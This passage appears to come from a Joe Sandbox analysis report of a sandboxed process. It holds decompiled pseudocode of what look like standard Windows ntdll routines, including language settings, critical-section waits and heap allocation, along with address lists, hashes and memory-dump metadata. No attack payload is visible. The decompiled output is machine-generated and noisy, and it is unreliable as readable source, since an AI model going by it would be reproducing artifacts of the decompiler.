				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E036DEEF0(0x37b7b60);
					_t134 =  *0x37b7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x37b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x37b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E036D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E036D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03768938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E036CB150();
													}
													_t116 = E03766D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E036D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x37b8638; // 0x2f14a78
																	_t122 = L036D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E036D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E036D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L036FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L036D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E036FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E036FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E036FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E036FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E036FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x37b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x37b7b84 = _t75;
						_t73 = E036DEB70(_t134, 0x37b7b60);
						if( *0x37b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E036DFF60( *0x37b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x036ffab0
0x036ffab2
0x036ffab3
0x036ffab4
0x036ffabc
0x036ffac0
0x036ffb14
0x036ffb17
0x036ffac2
0x036ffac8
0x036ffacd
0x036ffad3
0x036ffad3
0x036ffadd
0x036ffb18
0x036ffb1b
0x036ffb1d
0x036ffb1e
0x036ffb1f
0x036ffb20
0x036ffb21
0x036ffb22
0x036ffb23
0x036ffb24
0x036ffb25
0x036ffb26
0x036ffb27
0x036ffb28
0x036ffb29
0x036ffb2a
0x036ffb2b
0x036ffb2c
0x036ffb2d
0x036ffb2e
0x036ffb2f
0x036ffb3a
0x036ffb3b
0x036ffb3e
0x036ffb41
0x036ffb44
0x036ffb47
0x036ffb4a
0x036ffb4d
0x036ffb53
0x0373bdcb
0x0373bdcb
0x036ffb59
0x036ffb5b
0x036ffb5b
0x036ffb5e
0x0373bdd5
0x0373bdd8
0x00000000
0x0373bdda
0x00000000
0x0373bdda
0x036ffb64
0x036ffb64
0x036ffb64
0x036ffb67
0x036ffb6e
0x036ffb70
0x036ffb72
0x00000000
0x036ffb78
0x036ffb7a
0x036ffb7a
0x036ffb7d
0x036ffb80
0x0373bddf
0x0373bde1
0x00000000
0x0373bde3
0x00000000
0x0373bde3
0x036ffb86
0x036ffb86
0x036ffb86
0x036ffb8b
0x036ffb90
0x036ffb92
0x036ffb94
0x036ffb9a
0x036ffb9b
0x036ffba1
0x0373bde8
0x0373bdeb
0x0373bded
0x0373beb5
0x0373beb5
0x0373bebb
0x0373bebd
0x0373bec3
0x0373bed2
0x0373bedd
0x0373bedd
0x0373beed
0x00000000
0x0373bdf3
0x0373bdfe
0x0373be06
0x0373be0b
0x0373be0d
0x0373be0f
0x0373be14
0x0373be19
0x0373be20
0x0373be25
0x0373be27
0x0373be35
0x0373be39
0x0373be46
0x0373be4f
0x0373be54
0x0373be56
0x0373bef8
0x0373bef8
0x00000000
0x0373be5c
0x0373be5c
0x0373be60
0x00000000
0x0373be66
0x0373be66
0x0373be7f
0x0373be84
0x0373be87
0x0373be89
0x0373be8b
0x0373be99
0x0373be9d
0x0373bea0
0x0373beac
0x0373beaf
0x0373beb1
0x0373beb3
0x0373beb3
0x00000000
0x0373bea2
0x0373bea2
0x00000000
0x0373bea2
0x0373be8d
0x0373be8d
0x0373be92
0x00000000
0x0373be92
0x0373be8b
0x0373be60
0x0373be3b
0x0373be3b
0x0373be3e
0x00000000
0x0373be40
0x0373be40
0x0373be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0373be44
0x0373be3e
0x0373be29
0x0373be29
0x00000000
0x0373be29
0x0373be27
0x00000000
0x036ffba7
0x036ffba7
0x036ffbab
0x0373bf02
0x036ffbb1
0x036ffbb1
0x036ffbb8
0x036ffbbd
0x036ffbbd
0x036ffbbf
0x036ffbbf
0x036ffbc5
0x036ffbcb
0x036ffbf8
0x036ffbf8
0x036ffbfa
0x00000000
0x036ffc00
0x036ffc00
0x036ffc03
0x00000000
0x036ffc09
0x036ffc09
0x036ffc0f
0x036ffc15
0x036ffc23
0x036ffc23
0x036ffc25
0x036ffc27
0x036ffc75
0x036ffc7c
0x036ffc84
0x00000000
0x036ffc29
0x036ffc29
0x036ffc2d
0x036ffc30
0x0373bf0f
0x00000000
0x036ffc36
0x036ffc38
0x036ffc3b
0x036ffc41
0x0373bf17
0x0373bf19
0x0373bf48
0x0373bf4b
0x00000000
0x0373bf1b
0x0373bf22
0x0373bf24
0x0373bf26
0x00000000
0x0373bf2c
0x0373bf37
0x0373bf39
0x0373bf3b
0x00000000
0x0373bf41
0x0373bf41
0x0373bf41
0x0373bf41
0x0373bf45
0x00000000
0x0373bf45
0x0373bf3b
0x0373bf26
0x00000000
0x036ffc47
0x036ffc47
0x036ffc49
0x036ffcb2
0x036ffcb4
0x036ffcb6
0x036ffcdc
0x036ffcdc
0x00000000
0x036ffcb8
0x036ffcc3
0x036ffcc5
0x036ffcc7
0x00000000
0x036ffcc9
0x036ffcc9
0x036ffccd
0x00000000
0x036ffccd
0x036ffcc7
0x00000000
0x036ffc4b
0x036ffc4b
0x036ffc4e
0x036ffc4e
0x036ffc51
0x036ffc51
0x036ffc54
0x036ffc5a
0x036ffc5c
0x036ffc5f
0x036ffc61
0x036ffc63
0x036ffc65
0x036ffc67
0x036ffc6e
0x036ffc72
0x036ffc72
0x036ffc72
0x036ffc72
0x036ffc67
0x036ffc61
0x00000000
0x036ffc5a
0x036ffc49
0x036ffc41
0x036ffc30
0x036ffc27
0x036ffc03
0x036ffbcd
0x036ffbd3
0x036ffbd9
0x036ffbdc
0x036ffbde
0x036ffc99
0x036ffc9b
0x036ffc9d
0x036ffcd5
0x036ffcd5
0x036ffc89
0x036ffc89
0x00000000
0x036ffc9f
0x036ffc9f
0x036ffca3
0x00000000
0x036ffca3
0x00000000
0x036ffbe4
0x036ffbe4
0x036ffbe4
0x036ffbe4
0x036ffbe9
0x036ffbf2
0x00000000
0x036ffbf2
0x036ffbde
0x036ffbcb
0x036ffbab
0x036ffc8b
0x036ffc8b
0x036ffc8c
0x036ffb80
0x036ffb72
0x036ffb5e
0x036ffc8d
0x036ffc91
0x036ffadf
0x036ffadf
0x036ffae1
0x036ffae4
0x036ffae7
0x036ffaec
0x036ffaf8
0x036ffb00
0x036ffb07
0x036ffb0f
0x036ffb0f
0x036ffb07
0x00000000
0x036ffaf8
0x036ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0373BE0F

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 25482b7da05446f3c8c22784095e6df94f5c51e186d8dd3bf5fa6a3e674f4529
Instruction ID: 523f90a1b3d5106fc05a7cba749fd5b0353f3afd4eb82e1442f7a47e117cee61
Opcode Fuzzy Hash: 25482b7da05446f3c8c22784095e6df94f5c51e186d8dd3bf5fa6a3e674f4529
Instruction Fuzzy Hash: DDA1EF35A017168FDB25DF68C450B7AB3B9AF4A710F0845ADEA46DF791EB34D802CB80

Uniqueness

Uniqueness Score: -1.00%

Function 036C2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E036C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x37b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x37b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E037097C0();
				}
				if( *0x37b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x37b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E036F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E036E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0375FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03709520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E036FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0371DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x37b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x37b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03709980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E037095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E036E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E036E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03747016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0375FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x37b5350;
							if(_t109 != 0x37b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0375FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03755720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x036c2d8a
0x036c2d8a
0x036c2d92
0x036c2d96
0x036c2d9e
0x036c2da0
0x036c2da3
0x036c2da5
0x036c2da8
0x036c2dab
0x036c2db2
0x0371f9aa
0x0371f9ab
0x0371f9ae
0x0371f9ae
0x036c2db8
0x036c2dc2
0x0371f9b9
0x0371f9be
0x0371f9bf
0x0371f9bf
0x036c2dcf
0x0371f9c9
0x036c2dd5
0x036c2dd5
0x036c2dd5
0x036c2dde
0x036c2de1
0x036c2e70
0x036c2e72
0x036c2e72
0x036c2de7
0x036c2deb
0x036c2e7c
0x036c2e83
0x036c2e85
0x036c2e8b
0x036c2e8d
0x036c2e92
0x036c2e92
0x036c2e85
0x036c2df1
0x036c2df7
0x036c2df9
0x036c2df9
0x036c2dfc
0x036c2dff
0x036c2e02
0x00000000
0x036c2e05
0x036c2e0c
0x0371f9d9
0x036c2e12
0x036c2e12
0x036c2e12
0x036c2e1a
0x0371f9e3
0x0371f9e9
0x0371f9f0
0x0371f9f6
0x0371f9f8
0x0371f9f8
0x0371f9f0
0x036c2e23
0x0371fa02
0x0371fa03
0x0371fa05
0x0371fa06
0x00000000
0x036c2e29
0x036c2e29
0x036c2e2e
0x036c2e34
0x036c2e3e
0x00000000
0x00000000
0x036c2e44
0x036c2e47
0x036c2e4d
0x00000000
0x00000000
0x036c2e4f
0x036c2e54
0x00000000
0x00000000
0x036c2e5a
0x036c2e5f
0x036c2e9a
0x036c2ea4
0x036c2ea5
0x036c2ea8
0x036c2eaf
0x036c2eb2
0x036c2eb5
0x0371fae9
0x0371faeb
0x0371faed
0x0371faef
0x0371faf7
0x0371faf8
0x0371fafd
0x0371faff
0x0371fb04
0x0371fb04
0x0371faff
0x036c2ec0
0x036c2ec4
0x036c2ec6
0x036c2ec8
0x0371fb14
0x0371fb18
0x0371fb1e
0x0371fb21
0x0371fb21
0x036c2ece
0x036c2ece
0x036c2ece
0x036c2ed7
0x036c2e61
0x036c2e63
0x0371fa6b
0x0371fa71
0x0371fa76
0x0371fa78
0x0371fa8a
0x0371fa7a
0x0371fa83
0x0371fa83
0x0371fa8f
0x0371fa91
0x0371fa97
0x0371fa9d
0x0371faa4
0x0371faaa
0x0371faaf
0x0371fab1
0x0371fac3
0x0371fab3
0x0371fabc
0x0371fabc
0x0371fac8
0x0371facb
0x0371fadf
0x0371fadf
0x0371facb
0x0371faa4
0x0371fa91
0x036c2e6f
0x036c2e6f
0x036c2e5f
0x0371fa13
0x0371fa15
0x0371fa17
0x0371fa1f
0x0371fa21
0x0371fa22
0x0371fa25
0x0371fa28
0x0371fa2f
0x0371fa2f
0x0371fa2a
0x0371fa2a
0x0371fa2a
0x0371fa31
0x0371fa34
0x0371fa36
0x0371fa3c
0x0371fa3e
0x0371fa41
0x0371fa43
0x0371fa45
0x0371fa45
0x0371fa41
0x0371fa3c
0x0371fa4a
0x0371fa4f
0x0371fa51
0x0371fa53
0x0371fa56
0x0371fa5b
0x0371fa5e
0x00000000
0x0371fa5e
0x036c2e23

Strings

RTL: Re-Waiting, xrefs: 0371FA4A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: b63d661fec8474ce52f5f55c4cb8aa2a61fd0552f29f578b7d7a6868ee37122e
Instruction ID: 6f9b8b6cf158f4c966a6ae7dbf6d8b18ff0c8893fcdca7bac309f769f1643492
Opcode Fuzzy Hash: b63d661fec8474ce52f5f55c4cb8aa2a61fd0552f29f578b7d7a6868ee37122e
Instruction Fuzzy Hash: BF611632A00784DFDB21DF6CC8A4B7EB7B5EB49710F180AADD911AB2C1C774A9418791

Uniqueness

Uniqueness Score: -1.00%

Function 03790EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03790EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0378FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03791074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03709730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0378A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0378A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x37b8b04 >> 0x14) + (_v44 -  *0x37b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E036E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0378138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E036E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0377FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x37b8724 & 0x00000008) != 0) {
						E037852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E037915B5(0x37b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x03790eb7
0x03790eb9
0x03790ec0
0x03790ec2
0x03790ecd
0x0379105b
0x0379105b
0x03791061
0x03791066
0x03791066
0x0379106b
0x03791073
0x03791073
0x03790ed3
0x03790ed6
0x03790edc
0x03790ee0
0x03790ee7
0x03790ef0
0x03790ef5
0x03790efa
0x03790efc
0x03790efd
0x03790f03
0x03790f04
0x03790f06
0x03790f07
0x03790f09
0x03790f0e
0x03790f14
0x03790f23
0x03790f2d
0x03790f34
0x03790f34
0x03790f14
0x03790f52
0x00000000
0x00000000
0x03790f58
0x03790f73
0x03790f74
0x03790f79
0x03790f7d
0x03790f80
0x03790f86
0x03790fab
0x03790fb5
0x03790fc6
0x03790fd1
0x03790fe3
0x03790fd3
0x03790fdc
0x03790fdc
0x03790feb
0x03791009
0x03791009
0x03791015
0x03791027
0x03791017
0x03791020
0x03791020
0x0379102f
0x0379103c
0x0379103c
0x03791048
0x03791050
0x03791050
0x03791055
0x00000000
0x03791055
0x03790f88
0x03790f9e
0x03790fa2
0x03790fa9
0x00000000
0x00000000
0x00000000
0x03790fa9
0x00000000

Strings

`, xrefs: 03790F16

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 479b8dba58ca2cea44a2202c09776823b2fb430bbd02bd30703c147f02a239fe
Instruction ID: 92f4c7f9ad78c7b7c160ce43a9fccdfde852e82f7356dad77fc3bdafeab6d589
Opcode Fuzzy Hash: 479b8dba58ca2cea44a2202c09776823b2fb430bbd02bd30703c147f02a239fe
